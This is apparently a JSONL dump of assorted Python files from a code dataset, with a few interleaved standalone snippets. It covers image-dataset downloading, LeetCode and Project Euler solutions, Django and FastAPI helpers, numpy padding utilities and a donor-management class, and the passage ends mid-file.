Colors()\n\nflags = tf.app.flags\nflags.DEFINE_string('color_dataset_path', '', 'Path to color_dataset_path')\nFLAGS = flags.FLAGS\n\n'''\nREDIS_SERVER = os.environ['REDIS_SERVER']\nREDIS_PASSWORD = os.environ['REDIS_PASSWORD']\noptions = {\n 'REDIS_SERVER': REDIS_SERVER,\n 'REDIS_PASSWORD': REDIS_PASSWORD\n}\nlog = Logging(options, tag='generate-color-classifier-dataset')\nrconn = redis.StrictRedis(REDIS_SERVER, decode_responses=True, port=6379, password=REDIS_PASSWORD)\n'''\n\ndef get_colors(classes):\n color_dataset_path = FLAGS.color_dataset_path\n \n try:\n for clazz in classes:\n color_name = clazz\n\n \n os.chdir(color_dataset_path)\n try:\n os.mkdir(color_name)\n except FileExistsError:\n pass\n os.chdir(color_name) \n\n pprint('get_colors API... color : ' + color_name)\n \n offset = 0\n limit = 100\n i = 0\n while True:\n \n colors = api_instance.get_colors_by_name(color_name, offset=offset,\n limit=limit)\n\n for color in colors:\n _id = str(color['_id'])\n download_image_from_url(color['main_image'], _id + '.jpg')\n # pprint(color_object_list)\n\n if limit > len(colors):\n break\n else:\n offset += limit\n i += 1\n pprint('get_colors API... 
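# get_colors() above pages through the API with offset/limit and stops when a
# short page comes back (limit > len(colors)). The same pattern against a
# stubbed fetch; fetch_page and its fake data are illustrative, not the
# Colors API.
def fetch_page(offset, limit, _data=list(range(250))):
    return _data[offset:offset + limit]

def fetch_all(limit=100):
    offset, out = 0, []
    while True:
        page = fetch_page(offset, limit)
        out.extend(page)
        if len(page) < limit:  # a short page means the last page
            break
        offset += limit
    return out

assert len(fetch_all()) == 250  # pages of 100, 100, 50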
color : ' + color_name + ' / ' + str(i))\n\n pprint('get_colors API... color : ' + color_name + ' ALL Done !')\n\n except Exception as e:\n print(\"Exception when calling get_colors_by_name: %s\\n\" % e)\n\ndef get_color_classes():\n try:\n classes = api_instance.get_classes()\n return classes\n except Exception as e:\n print(\"Exception when calling get_color_classes: %s\\n\" % e)\n return None\n\ndef download_image_from_url(url, filename):\n try:\n urllib.urlretrieve(url, filename)\n except urllib.HTTPError:\n pass\n\n\ndef main(_):\n # log.info('Start generate-color-classifier-dataset')\n #classes = get_color_classes()\n color_list = ['Black', 'Gray', 'Purple', 'Blue', 'Brown','Green', 'Orange', 'Red', 'Pink', 'Yellow','White', 'Navy', 'Beige'] \n classes = color_list\n #if classes:\n get_colors(classes)\n\nif __name__ == '__main__':\n tf.app.run()\n","sub_path":"stylelens/dataset/deepfashion/attr_model/get_object_by_color.py","file_name":"get_object_by_color.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"589328924","text":"\"\"\"\nLeetCode #14\n\nWrite a function to find the longest common prefix string amongst an array of strings.\n\nIf there is no common prefix, return an empty string \"\".\n\nExample 1:\n\nInput: [\"flower\",\"flow\",\"flight\"]\nOutput: \"fl\"\nExample 2:\n\nInput: [\"dog\",\"racecar\",\"car\"]\nOutput: \"\"\nExplanation: There is no common prefix among the input strings.\nNote:\n\nAll given inputs are in lowercase letters a-z.\n\"\"\"\n\n\ndef longestCommonPrefix(strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if len(strs) == 0:\n return \"\"\n elif len(strs) == 1:\n return strs[0]\n longest_prefix = strs[0]\n for i in range(1, len(strs)):\n curr_prefix = \"\"\n curr_string = strs[i]\n for j in range(0, len(longest_prefix)):\n if j >= len(curr_string) or curr_string[j] != longest_prefix[j]:\n break\n else:\n curr_prefix += curr_string[j]\n if curr_prefix == \"\":\n return \"\"\n if len(curr_prefix) <= len(longest_prefix):\n longest_prefix = curr_prefix\n return longest_prefix\n\n","sub_path":"leetcode/LongestCommonPrefix.py","file_name":"LongestCommonPrefix.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"385483295","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/linkexchange_django/tests.py\n# Compiled at: 2011-05-12 16:14:22\nimport unittest\nfrom linkexchange.tests import MultiHashDriverTestMixin\nfrom linkexchange_django.models import DBHash\nfrom linkexchange_django.db_drivers import DjangoMultiHashDriver\n\nclass DBHashTest(unittest.TestCase):\n\n def setUp(self):\n self.hash = DBHash.objects.create(dbname='testdb', key='testkey')\n self.hash.save()\n\n def tearDown(self):\n self.hash.items.all().delete()\n self.hash.delete()\n\n def test_clear_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2')])\n self.hash.save()\n self.assertEqual(len(self.hash), 2)\n self.hash.clear_items()\n self.hash.save()\n self.assertEqual(len(self.hash), 0)\n\n def test_update_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2'), ('k3', 'v3')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.hash.update_items([('k3', 'v3x'), ('k4', 'v4')])\n self.hash.save()\n 
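# An equivalent, more idiomatic prefix scan for longestCommonPrefix using
# zip(): character columns are compared position by position and the scan
# stops at the first mismatch (zip also stops at the shortest string).
def longest_common_prefix(strs):
    prefix = []
    for column in zip(*strs):          # i-th character of every word
        if len(set(column)) != 1:
            break
        prefix.append(column[0])
    return ''.join(prefix)

assert longest_common_prefix(["flower", "flow", "flight"]) == "fl"
assert longest_common_prefix(["dog", "racecar", "car"]) == ""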
self.assertEqual(len(self.hash), 4)\n self.assertEqual(self.hash['k1'], 'v1')\n self.assertEqual(self.hash['k2'], 'v2')\n self.assertEqual(self.hash['k3'], 'v3x')\n self.assertEqual(self.hash['k4'], 'v4')\n\n def test_set_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2'), ('k3', 'v3')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.assertEqual(self.hash['k1'], 'v1')\n self.assertEqual(self.hash['k2'], 'v2')\n self.assertEqual(self.hash['k3'], 'v3')\n self.hash.set_items([('k1', 'v1'), ('k3', 'v3x'), ('k4', 'v4')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.assertEqual(self.hash['k1'], 'v1')\n self.assertEqual(self.hash['k3'], 'v3x')\n self.assertEqual(self.hash['k4'], 'v4')\n\n def test_delete_items(self):\n self.hash.set_items([('k1', 'v1'), ('k2', 'v2'), ('k3', 'v3')])\n self.hash.save()\n self.assertEqual(len(self.hash), 3)\n self.hash.delete_items(['k2', 'k3'])\n self.assertEqual(len(self.hash), 1)\n\n\nclass DjangoMultiHashDriverTest(MultiHashDriverTestMixin, unittest.TestCase):\n with_blocking = False\n\n def setUp(self):\n self.db = DjangoMultiHashDriver('testdb')\n\n def tearDown(self):\n for h in DBHash.objects.filter(dbname=self.db.dbname):\n h.items.all().delete()\n h.delete()\n\n del self.db","sub_path":"pycfiles/LinkExchange.Django-0.1-py2.7/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"373092714","text":"import sys\nimport random\nimport string\n\n\ndef write():\n print('Creating new text file')\n\n name = str(sys.argv[1]) + '_graph_' + str(sys.argv[2]) +'.txt' # Name of text file coerced with +.txt\n try:\n file = open(name,'w') # Trying to create a new file or open one\n numNodes = int(sys.argv[1])\n numEdges = int(sys.argv[2])\n \n lineOne = ''\n for i in range(1, numNodes+1):\n lineOne += str(i) + ' ' \n lineOne += '\\n'\n file.write(lineOne)\n \n #make connections\n possible = []\n for i in range(1, numNodes+1):\n for j in range(1, numNodes+1):\n if j != i:\n possible.append([i,j])\n\n edges = random.sample(possible, numEdges)\n outString = '('\n for edge in edges:\n outString += str(edge) + ', '\n finalString = outString\n \n finalString = finalString[:-2]\n finalString += ')'\n file.write(finalString)\n \n file.close()\n\n except:\n print('Something went wrong! 
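# The graph generator above builds all ordered node pairs with two nested
# loops and then draws numEdges of them with random.sample.
# itertools.permutations produces the same candidate pool in one call:
import itertools
import random

num_nodes, num_edges = 4, 5
possible = list(itertools.permutations(range(1, num_nodes + 1), 2))
edges = random.sample(possible, num_edges)   # distinct directed edges
assert len(edges) == len(set(edges)) == num_edges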
Can\\'t tell what?')\n sys.exit(0) # quit Python\n\nwrite()\n\t\n\n\t\n","sub_path":"finalgraph_creator.py","file_name":"finalgraph_creator.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"426402260","text":"from fastapi import UploadFile\n\nfrom appstore.exceptions.appstore_exceptions import InvalidFileException, UnsupportedMediaTypeException, InvalidFileNameException\n\n\ndef validate_image(file: UploadFile) -> bool:\n if file is None:\n raise InvalidFileException\n\n if file.content_type.lower() != \"image/jpeg\" and file.content_type.lower() != \"image/png\":\n raise UnsupportedMediaTypeException\n\n if file.filename is None or not (file.filename.lower().endswith(\".jpg\") or file.filename.lower().endswith(\".png\")):\n raise InvalidFileNameException\n\n return True\n","sub_path":"appstore/utils/validator/file_validator.py","file_name":"file_validator.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"71"} +{"seq_id":"639073352","text":"height = 0\n# loop to ensure input between 1 nd 8\nwhile (height < 1) or (height > 8):\n try:\n height = int(input(\"Height: \"))\n except ValueError:\n print(\"Input must be a whole number between 1 and 8\")\n # construct the pyramid, row by row\nfor i in range(1, height + 1):\n print((\" \" * (height - i)) + (\"#\" * i) + \" \" + (\"#\" * i))\n\n","sub_path":"pset6/mario/more/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"90703296","text":"\n\nimport re \nimport collections #引入正则表达式\ncount = int()\ndef stats_text_en(en,count): #定义一个函数\n #\\u4e00-\\u9fa5 \t汉字的unicode范围\n #\\u0030-\\u0039 \t数字的unicode范围\n #\\u0041-\\u005a \t大写字母unicode范围\n #\\u0061-\\u007a \t小写字母unicode范围\n #sub(pattern,repl,string) \t把字符串中的所有匹配表达式pattern中的地方替换成repl\n \n if isinstance(en,str):\n t1= re.sub(u\"([^\\u0041-\\u005a\\u0061-\\u007a])\",\" \",en) #将en中非英文字符转换成“ ”\n text1 = t1.split() #将字符串分割\n d = collections.Counter(text1).most_common(count) #counter 函数自带统计排列功能\n return d\n else:\n raise ValueError(\"请输入字符串\")\n\n\nimport jieba\ndef stats_text_cn(cn,count): #定义一个统计中文汉字字频的函数\n if isinstance(cn,str):\n t = re.sub(u\"([^\\u4e00-\\u9fa5])\",\"\",cn) #将cn中非中文字符转换成“”\n t1 = jieba.cut(t)\n d = collections.Counter(t1).most_common(count)\n return d\n else:\n raise ValueError(\"请输入字符串\")\n\n\ndef stats_text(j,count): #定义合并输出函数\n a = stats_text_cn(j,count) + stats_text_en(j,count) #将两次统计结果合并\n return a\n","sub_path":"exercises/1901010059/day09/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"3434315","text":"#!/bin/python\r\n# -*- coding: utf8 -*-\r\nimport sys\r\nimport os\r\nimport re\r\n\r\n# 请完成下面这个函数,实现题目要求的功能\r\n# 当然,你也可以不按照下面这个模板来作答,完全按照自己的想法来 ^-^\r\n# ******************************开始写代码******************************\r\n\r\n\r\ndef solution(arr):\r\n if len(arr) == 0:\r\n return 0\r\n ret = 0\r\n for i in range(len(arr) - 1):\r\n ret = ret + helper1(arr, i)\r\n return ret\r\n\r\n\r\ndef helper1(arr, i):\r\n ind = i\r\n mi = arr[i]\r\n for j in range(i + 1, len(arr)):\r\n if arr[j] < mi:\r\n mi = arr[j]\r\n ind = j\r\n if ind == i:\r\n return 0\r\n else:\r\n tmp = arr[ind]\r\n for k in range(ind, i):\r\n arr[k + 1] = arr[k]\r\n 
arr[i] = tmp\r\n return 1\r\n\r\n # ******************************结束写代码******************************\r\n\r\n\r\n# _arr_cnt = 0\r\n# _arr_cnt = int(input())\r\n# _arr_i = 0\r\n# _arr = []\r\n# while _arr_i < _arr_cnt:\r\n# _arr_item = int(input())\r\n# _arr.append(_arr_item)\r\n# _arr_i += 1\r\n_arr = [1, 9, 7, 5, 3]\r\n\r\nres = solution(_arr)\r\n\r\nprint(str(res) + \"\\n\")\r\n","sub_path":"src/writtenexam/xiaomi/delete_num.py","file_name":"delete_num.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"382132169","text":"from django.conf.urls import url\nfrom django.contrib import admin\nfrom . import views\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom .person_autocomplete import PersonAutocomplete\n\napp_name = 'order'\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^login', views.login_view, name='login'),\n url(r'^logout', views.logout_view, name='logout'),\n url(r'^$', views.person_list, name='home'),\n url(r'^person/(?P[0-9]+)/$', views.person_detail),\n url(r'^person/(?P[0-9]+)/up$', views.vote_view, {'vote': 'up'}),\n url(r'^person/(?P[0-9]+)/down$', views.vote_view, {'vote': 'down'}),\n url(r'^person/(?P[0-9]+)/edit', views.edit_person),\n url(r'^vote/(?P[0-9]+)/edit', views.edit_vote),\n url(r'^vote/(?P[0-9]+)/delete', views.edit_vote, {'remove': True}),\n url(r'^add_person$', views.edit_person),\n url(r'^profile/$', views.profile),\n url(\n r'^person-autocomplete/$',\n PersonAutocomplete.as_view(create_field='name'),\n name='person-autocomplete',\n ),\n url(r'reset/$', views.password_change),\n url(r'invite/$', views.invitations_view),\n url(r'registration/$', views.registration_view),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"app/rating/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"334609728","text":"import turtle, colorsys,random\nt=turtle.Turtle()\nturtle.setup(800,800)\n\nn=0\ndistance=200\ndef tree(i):\n if i<=n:\n if i>n*0.6:\n t.color(\"green\")\n else:\n t.color(\"brown\")\n if n>8 and i==n and random.randint(1,2)==1:\n t.color(\"hot pink\")\n \n t.pensize(20/i)\n dis=random.uniform(distance/i*0.5,distance/i)\n t.fd(dis)\n t.left(30)\n i+=1\n tree(i)\n t.right(60)\n tree(i)\n t.left(30)\n i-=1\n t.penup()\n t.bk(dis)\n t.pendown()\nt.penup()\nt.goto(0,-300)\nt.pendown()\nt.left(90)\nprint(\"Enter Int Value\")\nn=int(input())\ntree(1)\n","sub_path":"Practice/gs15113_CYK_Practice_02_02_adv.py","file_name":"gs15113_CYK_Practice_02_02_adv.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"561740264","text":"from datatool.dataset_abstract import Dataset\nimport os\nimport wget\nimport pandas as pd\nfrom intervaltree.intervaltree import IntervalTree\nimport json\nfrom general.utils import Data\n\n\nclass VanKasteren(Dataset):\n def __init__(self,data_path,data_dscr):\n super().__init__(data_path,data_dscr);\n \n def _load(self):\n rootfolder = self.data_path\n sensefile = rootfolder + \"sensedata.txt\"\n actfile = rootfolder + \"actdata.txt\"\n\n all = pd.read_csv(sensefile, '\\t', None, header=0, names=[\n \"StartTime\", \"EndTime\", \"SID\", \"value\"])\n\n all.StartTime = pd.to_datetime(all.StartTime, format='%d-%b-%Y %H:%M:%S')\n all.EndTime = 
pd.to_datetime(all.EndTime, format='%d-%b-%Y %H:%M:%S')\n acts = {\n 0: 'None',\n 1: 'leave house',\n 4: 'use toilet',\n 5: 'take shower',\n 10: 'go to bed',\n 13: 'prepare Breakfast',\n 15: 'prepare Dinner',\n 17: 'get drink'}\n\n sens = {\n 1:\t'Microwave',\n 5:\t'Hall-Toilet door',\n 6:\t'Hall-Bathroom door',\n 7:\t'Cups cupboard',\n 8:\t'Fridge',\n 9:\t'Plates cupboard',\n 12:\t'Frontdoor',\n 13:\t'Dishwasher',\n 14:\t'ToiletFlush',\n 17:\t'Freezer',\n 18:\t'Pans Cupboard',\n 20:\t'Washingmachine',\n 23:\t'Groceries Cupboard',\n 24:\t'Hall-Bedroom door'}\n\n sensor_events = pd.DataFrame(columns=[\"SID\", \"time\", \"value\"])\n for i, s in all.iterrows():\n sensor_events = sensor_events.append({'SID': sens[s.SID], 'time': s.StartTime, 'value': s.value}, ignore_index=True)\n sensor_events = sensor_events.append({'SID': sens[s.SID], 'time': s.EndTime, 'value': 0}, ignore_index=True)\n\n activity_events = pd.read_csv(actfile, '\\t', None, header=0, names=[\"StartTime\", \"EndTime\", \"Activity\"])\n activity_events.StartTime = pd.to_datetime(\n activity_events.StartTime, format='%d-%b-%Y %H:%M:%S')\n activity_events.EndTime = pd.to_datetime(activity_events.EndTime, format='%d-%b-%Y %H:%M:%S')\n activity_events.Activity = activity_events.Activity.apply(lambda x: acts[x])\n sensor_events = sensor_events.sort_values(['time'])\n activity_events = activity_events.sort_values(['StartTime', 'EndTime'])\n # print('finish downloading files')\n \n\n activities = [acts[k] for k in acts]\n\n sensor_desc = pd.DataFrame(columns=['ItemId', 'ItemName', 'Cumulative',\n 'Nominal', 'OnChange', 'ItemRange', 'Location', 'Object', 'SensorName'])\n tmp_sensors = sensor_events['SID'].unique()\n for k in sens:\n item = {'ItemId': sens[k], 'ItemName': sens[k], 'Cumulative': 0, 'Nominal': 1, 'OnChange': 1, 'ItemRange': {\n 'range': ['0', '1']}, 'Location': 'None', 'Object': 'None', 'SensorName': 'None'}\n sensor_desc = sensor_desc.append(item, ignore_index=True)\n\n return activity_events, activities, sensor_events, sensor_desc\n # loadVanKasterenDataset()\n","sub_path":"datatool/vankasteren_handeler.py","file_name":"vankasteren_handeler.py","file_ext":"py","file_size_in_byte":3156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"321506601","text":"# coding:utf-8\nimport unittest\nfrom time import *\nfrom selenium import webdriver\nfrom public import login, quit, creditCheckingDev, visaInterviewDev\n\n# 设置预期结果\nexpResult = \"test123\"\n\n\nclass MyTestCase(unittest.TestCase):\n # 环境预置\n def setUp(self):\n # self.browser = webdriver.Chrome() # 打开谷歌浏览器\n self.browser = webdriver.Firefox() # 打开火狐浏览器\n self.browser.implicitly_wait(15) # 隐性等待,最长等15秒\n self.url = \"http://10.1.2.151:6502\" # 打开开发环境的业务管理系统\n\n # 环境恢复\n # def tearDown(self):\n # quit.quit(self.browser) # 关闭浏览器\n\n # 测试用例\n def test_creditChecking_visaInterview_dev(self):\n # 操作步骤\n br = self.browser # 简化书写\n br.get(self.url) # 打开浏览器和系统\n print(br.title) # 把系统的title打印出来\n login.business_login_dev(br) # 登录开发环境的业务管理系统\n sleep(3)\n\n ##########################################################\n\n creditCheckingDev.test_creditChecking_dev(br) # 进行“征信通过”的操作\n\n ##############################################################\n\n visaInterviewDev.test_visaInterview_dev(br) # 进行“网点面签”的操作\n\n # 断言\n realResult = \"test123\"\n self.assertEqual(expResult, realResult)\n self.assertIn(expResult, realResult)\n\nif __name__ == '__main__':\n 
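# The loader above explodes each (StartTime, EndTime, value) interval into
# two point events -- the value at the start, 0 at the end -- then sorts by
# time. The same transform on a toy frame, using pd.concat instead of the
# slower row-by-row append:
import pandas as pd

spans = pd.DataFrame({'SID': ['Fridge'],
                      'StartTime': pd.to_datetime(['2008-02-25 09:00:00']),
                      'EndTime': pd.to_datetime(['2008-02-25 09:00:30']),
                      'value': [1]})
events = pd.concat([
    spans.rename(columns={'StartTime': 'time'})[['SID', 'time', 'value']],
    spans.rename(columns={'EndTime': 'time'})[['SID', 'time']].assign(value=0),
]).sort_values('time').reset_index(drop=True)
assert list(events['value']) == [1, 0]   # on-event first, off-event second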
unittest.main()\n","sub_path":"testCases/creditChecking_visaInterview_dev.py","file_name":"creditChecking_visaInterview_dev.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"395151126","text":"\nimport numpy as np\n\ndef pad(data, padwidth, value):\n data = np.asarray(data)\n shape = data.shape\n if isinstance(padwidth, int):\n padwidth = (padwidth,)*len(shape) \n \n padded_shape = map(lambda ix: ix[1]+padwidth[ix[0]]*2, enumerate(shape))\n new_data = np.zeros(padded_shape, dtype=data.dtype)\n new_data.fill(value)\n new_data[ [slice(w, -w) if w > 0 else slice(None) for w in padwidth] ] = data \n return new_data\n\ndef multipad(data, padwidth, values):\n data = np.asarray(data)\n shape = data.shape\n if isinstance(padwidth, int):\n padwidth = (padwidth,)*len(shape) \n \n padded_shape = map(lambda ix: ix[1]+padwidth[ix[0]]*2, enumerate(shape))\n new_data = np.zeros(padded_shape, dtype=data.dtype)\n new_data[...,:] = values\n new_data[ [slice(w, -w) if w > 0 else slice(None) for w in padwidth] ] = data \n return new_data\n\ndef zeropad(data, padwidth):\n return pad(data, padwidth, 0.0) \n\ndef zeropad_to_shape(data, shape):\n \"\"\"Zero-pads an array to a certain shape\"\"\"\n new_data = np.zeros(shape)\n new_data[ [slice(shape[i]//2 - data.shape[i]//2, shape[i]//2 - data.shape[i]//2 + data.shape[i]) for i in xrange(len(shape))] ] = data\n return new_data\n\ndef border_value_pad(data, padwidth):\n data = np.asarray(data)\n shape = data.shape\n if isinstance(padwidth, int):\n padwidth = (padwidth,)*len(shape) \n \n padded_shape = map(lambda ix: ix[1]+padwidth[ix[0]]*2, enumerate(shape))\n new_data = np.empty(padded_shape, dtype=data.dtype)\n new_data[ [slice(w, -w) if w > 0 else slice(None) for w in padwidth] ] = data\n \n for i, pw in enumerate(padwidth):\n if pw > 0:\n selection = [slice(None)] * data.ndim\n selection2 = [slice(None)] * data.ndim\n \n # Lower boundary\n selection[i] = slice(0, pw)\n selection2[i] = slice(pw, pw+1)\n new_data[tuple(selection)] = new_data[tuple(selection2)]\n \n # Upper boundary\n selection[i] = slice(-pw, None)\n selection2[i] = slice(-pw-1, -pw)\n new_data[tuple(selection)] = new_data[tuple(selection2)]\n \n \n return new_data\n \n","sub_path":"amitgroup/util/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"85787951","text":"import pytest\nfrom threading import Thread\n\nfrom tests.conftest import MOCKED_URL\n\nN_THREADS = 10\nN_ITERATIONS = 20\n\n\n@pytest.mark.parametrize('iteration', range(N_ITERATIONS))\n@pytest.mark.parametrize('backend', ['sqlite', 'mongodb', 'gridfs', 'redis', 'dynamodb'])\ndef test_caching_with_threads(backend, iteration, mock_session):\n \"\"\"Stress test for multi-threaded caching\"\"\"\n\n def send_requests(url, params):\n for i in range(10):\n mock_session.get(url, params=params)\n\n threads = [Thread(target=send_requests, args=(MOCKED_URL, {'param': i})) for i in range(N_THREADS)]\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n\n for i in range(N_THREADS):\n assert mock_session.cache.has_url(f'{MOCKED_URL}?param={i}')\n","sub_path":"tests/unit/test_thread_safety.py","file_name":"test_thread_safety.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"604107629","text":"if __name__ == 
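# zeropad()/border_value_pad() above hand-roll what numpy ships as np.pad
# (note the Python 2 idioms there: list-returning map, xrange). Under
# Python 3, np.pad covers both variants directly:
import numpy as np

a = np.array([[1, 2], [3, 4]])
z = np.pad(a, 1)                # constant zeros, like zeropad(a, 1)
assert z.shape == (4, 4) and z[0].tolist() == [0, 0, 0, 0]
e = np.pad(a, 1, mode='edge')   # replicate borders, like border_value_pad(a, 1)
assert e[0].tolist() == [1, 1, 2, 2]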
'__main__':\n import sys\n sys.path.insert(0, 'C:\\\\Users\\\\James Jiang\\\\Documents\\\\Project Euler')\n\nfrom functions import *\n\nfrom progress import Progress\nanswers_list = ['dummy']\nwith open('C:\\\\Users\\\\James Jiang\\\\Documents\\\\Project Euler\\\\answers.txt') as answers:\n for line in answers:\n answers_list.append(int(line))\nprogress_ = Progress(\"Problem 066: Diophantine equation\", 0, 1000)\n\nmax_x = 0\nmax_D = 0\n\nfor D in range(2, 1001):\n progress_.count = D\n progress_.progress()\n if not is_square(D):\n d = minimal_solution(D)\n if d > max_x:\n max_x = d\n max_D = D\n\nprogress_.count = max_D\nprogress_.total = answers_list[66]\nprogress_.progress()\n\nif __name__ == '__main__':\n input()\n","sub_path":"python/problem_66.py","file_name":"problem_66.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"552287887","text":"arr = input().split()\nc = [[]]\nsum = 0\nfor i in range(len(arr)):\n n = i+1\n while (n<=len(arr)):\n d = arr[i:n]\n c.append(d)\n n += 1\nfor i in c:\n if(len(i)%2==1):\n for j in i:\n sum = sum+int(j)\nprint(sum)\n","sub_path":"answers/Utkarsh Srivastava/Day 6/Question 2.py","file_name":"Question 2.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"65889109","text":"import albumentations as A\nfrom albumentations.pytorch import ToTensorV2\n\ntrain_transform = A.Compose(\n [\n A.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n # A.CropAndPad(4),\n A.RandomCrop(32, 32),\n A.HorizontalFlip(),\n A.Cutout(num_holes=1, max_h_size=8, max_w_size=8, always_apply=False),\n ToTensorV2()\n ]\n)\n\ntest_transform = A.Compose([A.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),ToTensorV2()])","sub_path":"EVA S11/album_transform.py","file_name":"album_transform.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"243961904","text":"import numpy\r\n\r\n#\"\"\"\r\nm = int(input('\\nValor de m:'))\r\nn = int(input('Valor de n:'))\r\n\r\nmatrix = numpy.zeros((m,n))\r\nvector = numpy.zeros((n))\r\nx = numpy.zeros((m))\r\n\r\nprint ('Introduce la matriz de coeficientes y el vector solución')\r\n\r\nfor r in range(0, m):\r\n for c in range(0, n):\r\n matrix[(r),(c)]=(input(\"Elemento a[\"+str(r+1)+\",\"+str(c+1)+\"] \"))\r\n\r\n#Codigo funcionando para matrices 3x3 - ingresada por el usuario\r\nprint ('\\nmatriz ingresada: \\n')\r\nprint(matrix)\r\nprint ('\\nDeterminante de la matriz: ', numpy.linalg.det(matrix))\r\n\r\n#\"\"\"\r\n\r\n\"\"\"\r\n#Codigo alternativo para matrices de orden nxn\r\nmatrixnn = [[0, 2, 3], [7, -1, 20], [1, -14, 8]] \r\nprint ('\\nmatriz ingresada: \\n')\r\nprint(matrixnn)\r\nprint ('\\nDeterminante de la matriz: ', numpy.linalg.det(matrixnn))\r\n\"\"\"","sub_path":"pocketRocket/methods/determinante.py","file_name":"determinante.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"382085795","text":"# https: // leetcode.com/problems/best-time-to-buy-and-sell-stock/\n\ndef maxProfit(prices):\n if len(prices) == 0:\n return None\n \n profit = 0\n minBuy = prices[0]\n\n for idx in range(1, len(prices)):\n current = prices[idx] - minBuy\n\n profit = max(current, profit)\n minBuy = min(minBuy, prices[idx])\n\n return profit\n\ninput = 
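# Question 2 above enumerates every subarray and sums the odd-length ones in
# O(n**3). Each arr[i] sits in (i+1)*(n-i) subarrays, of which
# ((i+1)*(n-i) + 1) // 2 have odd length, giving an O(n) equivalent:
def sum_odd_length_subarrays(arr):
    n = len(arr)
    return sum(((i + 1) * (n - i) + 1) // 2 * v for i, v in enumerate(arr))

# Brute-force cross-check on a small input:
arr = [1, 4, 2, 5, 3]
brute = sum(sum(arr[i:j]) for i in range(len(arr))
            for j in range(i + 1, len(arr) + 1) if (j - i) % 2 == 1)
assert sum_odd_length_subarrays(arr) == brute == 58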
[7, 1, 5, 3, 6, 4]\n\nprint(maxProfit(input))\n# Output: 5\n","sub_path":"array/buy_sell_stock.py","file_name":"buy_sell_stock.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"72"} +{"seq_id":"420213850","text":"#!/usr/bin/env python3\n\nimport pathlib\npth = pathlib.Path('./')\n\n\nclass Donor:\n\n def __init__(self, name):\n self._name = name\n self._donations = []\n self._rollup = {}\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, val):\n if not val:\n raise ValueError(\"A Donor must have a name.\")\n self._name = val\n\n @property\n def donations(self):\n return self._donations\n\n @donations.setter\n def donations(self, updated):\n self._donations = updated\n\n def add_donation(self, val):\n if val < 1:\n raise ValueError(\"A positive donation value is required.\")\n self.donations.append(val)\n\n @property\n def rollup(self):\n return self._rollup\n\n @rollup.setter\n def rollup(self, val):\n if not val:\n raise ValueError(\"Rollup values are required.\")\n self._rollup = val\n\n\nclass DonorList:\n\n def __init__(self, donors=None):\n self._donors = donors if donors else {}\n\n @property\n def donors(self):\n return self._donors\n\n def add_donor(self, name):\n donor = Donor(name)\n self.donors[donor.name] = donor\n\n def get_donor(self, name):\n if not name:\n raise ValueError(\"Please provide a donor name.\")\n\n if name in self.donors:\n return self.donors[name]\n 